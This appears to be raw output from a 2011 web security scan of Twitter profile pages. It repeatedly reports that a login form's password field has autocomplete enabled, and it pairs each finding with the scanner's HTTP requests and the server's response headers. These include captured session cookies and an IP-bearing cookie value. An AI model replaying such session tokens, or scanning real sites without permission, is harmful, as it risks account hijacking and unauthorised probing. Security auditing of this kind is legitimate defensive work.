HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:36 GMT Server: hi Status: 200 OK X-Transaction: 1296224736-35616-58920 ETag: "ce84c6d523ac490f74725d4e72e7cdcf" Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT X-Runtime: 0.01412 Content-Type: text/html; charset=utf-8 Content-Length: 44218 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ExpertDan HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:52 GMT Server: hi Status: 200 OK X-Transaction: 1296225052-83422-12297 ETag: "71df0fbad70a67fb009c57f7a62454f1" Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT X-Runtime: 0.01535 Content-Type: text/html; charset=utf-8 Content-Length: 53009 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Michael_Joseph HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:39 GMT Server: hi Status: 200 OK X-Transaction: 1296224739-65021-17900 ETag: "4ee6993dd58f48089b6cdab2133559a8" Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT X-Runtime: 0.01172 Content-Type: text/html; charset=utf-8 Content-Length: 51377 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /PageLines HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:04 GMT Server: hi Status: 200 OK X-Transaction: 1296225004-17515-51236 ETag: "24c45e2f38e6ae478c4805af9b36ff8e" Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT X-Runtime: 0.01227 Content-Type: text/html; charset=utf-8 Content-Length: 51190 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /PureADK HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:28 GMT Server: hi Status: 200 OK X-Transaction: 1296225028-9085-29245 ETag: "6ea59f215eff63985173a556c3c58572" Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT X-Runtime: 0.01097 Content-Type: text/html; charset=utf-8 Content-Length: 57696 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /RobertDuffy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-67311-52082 ETag: "e57068ea600d03f7a7bf890e4a74a917" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.01335 Content-Type: text/html; charset=utf-8 Content-Length: 50645 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Script_Junkie HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-37028-38797 ETag: "942c1294489429968d893d85a4217f57" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01350 Content-Type: text/html; charset=utf-8 Content-Length: 47541 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Servigistics HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:35 GMT Server: hi Status: 200 OK X-Transaction: 1296225035-39147-1499 ETag: "7908e6f2089de69430d5a81b1f257ac2" Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT X-Runtime: 0.01232 Content-Type: text/html; charset=utf-8 Content-Length: 50563 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Simply_b06 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:08 GMT Server: hi Status: 200 OK X-Transaction: 1296225007-69414-28796 ETag: "24db63c3097b33b2dc035ce49f9408ff" Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT X-Runtime: 0.01086 Content-Type: text/html; charset=utf-8 Content-Length: 36440 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /SlexAxton HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:45 GMT Server: hi Status: 200 OK X-Transaction: 1296225045-59196-5393 ETag: "507dff22fcced375038cdd9631235460" Last-Modified: Fri, 28 Jan 2011 14:30:45 GMT X-Runtime: 0.00969 Content-Type: text/html; charset=utf-8 Content-Length: 49927 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Support HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-79439-58935 ETag: "6f3f0f6d45a5a9149a4d122ad96ea840" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.01685 Content-Type: text/html; charset=utf-8 Content-Length: 51752 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /Svantasukhai HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-92538-25020 ETag: "b5b7378e54ede43eec0f6508eb5d2185" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.00759 Content-Type: text/html; charset=utf-8 Content-Length: 29522 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /TechCrunch HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-62897-59906 ETag: "d9c3c5e13ec1f2f0ecf37be4ab550c0a" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.00806 Content-Type: text/html; charset=utf-8 Content-Length: 54066 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ajpiano HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-9839-24776 ETag: "6cfb51a84c8ef82cfc30accecbfd12df" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01348 Content-Type: text/html; charset=utf-8 Content-Length: 48953 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /androidnewsblog HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-13968-5956 ETag: "b0e4ae48560abd6de3188c44a0de9618" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01122 Content-Type: text/html; charset=utf-8 Content-Length: 49638 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /bennadel HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
